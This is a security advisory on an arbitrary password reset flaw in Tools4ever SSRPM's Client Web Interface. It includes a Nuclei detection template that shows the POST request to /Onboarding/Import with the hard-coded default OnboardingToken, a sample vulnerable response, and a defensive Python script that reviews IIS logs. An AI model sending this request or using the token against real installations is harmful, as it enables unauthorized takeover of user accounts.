SSRPM (Self-Service Reset Password Manager) is Tools4ever’s premier password self-service solution. It allows organizations of all sizes to unburden their helpdesk and empower their end users regarding forgotten passwords and account management.
This solution is usually synchronized with an on-premise Active Directory and its Client Web Interface component is usually exposed to the Internet.
The default installation of the Client Web Interface, which is provided alongside the COM SSRPM service, defines a hard-coded secret token for the Import endpoint. This endpoint allows registering new accounts or overwriting existing onboarding data for an arbitrary account, which ultimately allows changing the password of an arbitrary account.
Issuing a POST request to the /Onboarding/Import endpoint with the default OnboardingToken shows whether the targeted installation is affected by this vulnerability.
If it is, the server returns an HTTP response with the ErrorCode value -55.
Nuclei Template:
generated using ProjectDiscoveryAI Tool
id: tools4ever-ssrpm-arbitrary-password-reset

info:
  name: Tools4Ever SSRPM Arbitrary Password Reset
  author: ProjectDiscoveryAI
  severity: high
  description: |
    Tools4Ever SSRPM is vulnerable to arbitrary password reset due to improper validation of the onboarding token, allowing attackers to take control of certain accounts.
  reference:
    - https://www.synacktiv.com/advisories/ssrpm-arbitrary-password-reset-on-default-client-web-interface-installation

http:
  - raw:
      - |
        POST /Onboarding/Import HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 64
        Content-Type: application/x-www-form-urlencoded

        OnboardingToken=7e30bebc-d17c-4833-98b6-d4c09e076b24&Action=testIntrinsec

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        words:
          - '"ErrorCode":-55'
          - '"Success":false'
Example of response of a vulnerable target:
HTTP/1.1 200 OK
Date: Tue, 25 Jun 2024 12:33:52 GMT
Server: XXX
Set-Cookie: ASP.NET_SessionId=2iaeferfvwc0j3f30bbjvlmt; path=/; HttpOnly; SameSite=Lax
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self';
Strict-Transport-Security: max-age=31536000
Content-Length: 133

{"Success":false,"ErrorCode":-55,"ErrorMessage":"An error occurred. Please contact your system administrator if the issue persists."}
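
To review whether the Import endpoint has been called from unexpected sources, the web server logs can be searched for POST requests to /Onboarding/Import. The following is an added example, not part of the original advisory or template; it assumes IIS W3C logs carrying a #Fields directive, and the TRUSTED_SOURCES allowlist and the sample log lines are constructed for illustration.

```python
import ipaddress

# Constructed IIS W3C log sample (documentation address ranges, not real data).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2024-06-25 12:33:50 10.0.0.5 GET /Account/Login - 443 - 198.51.100.7 Mozilla/5.0 200
2024-06-25 12:33:52 10.0.0.5 POST /Onboarding/Import - 443 - 203.0.113.44 curl/8.0 200
2024-06-25 12:40:01 10.0.0.5 POST /onboarding/import/ - 443 - 10.0.0.20 SyncJob 200
2024-06-25 12:41:10 10.0.0.5 GET /Onboarding/Import - 443 - 203.0.113.44 curl/8.0 404
"""

ENDPOINT = "/onboarding/import"
# Assumption: networks expected to call Import legitimately (hypothetical allowlist).
TRUSTED_SOURCES = [ipaddress.ip_network("10.0.0.0/24")]


def parse_w3c(text):
    """Yield one dict per request, using the #Fields directive as the schema."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):  # skip truncated or malformed rows
                yield dict(zip(fields, values))


def is_trusted(addr):
    """True only for a parseable client address inside the allowlist."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    return any(ip in net for net in TRUSTED_SOURCES)


def suspicious_imports(text):
    """Return POSTs to the Import endpoint from sources outside the allowlist."""
    hits = []
    for row in parse_w3c(text):
        path = row.get("cs-uri-stem", "").lower().rstrip("/")
        if row.get("cs-method") == "POST" and path == ENDPOINT and not is_trusted(row.get("c-ip", "")):
            hits.append((row["date"], row["time"], row["c-ip"], row["sc-status"]))
    return hits


if __name__ == "__main__":
    for hit in suspicious_imports(SAMPLE_LOG):
        print("review:", *hit)
```

IIS does not log POST bodies by default, so the token value itself will not appear in these logs; the source address and timing of each hit are what to correlate with onboarding or password changes.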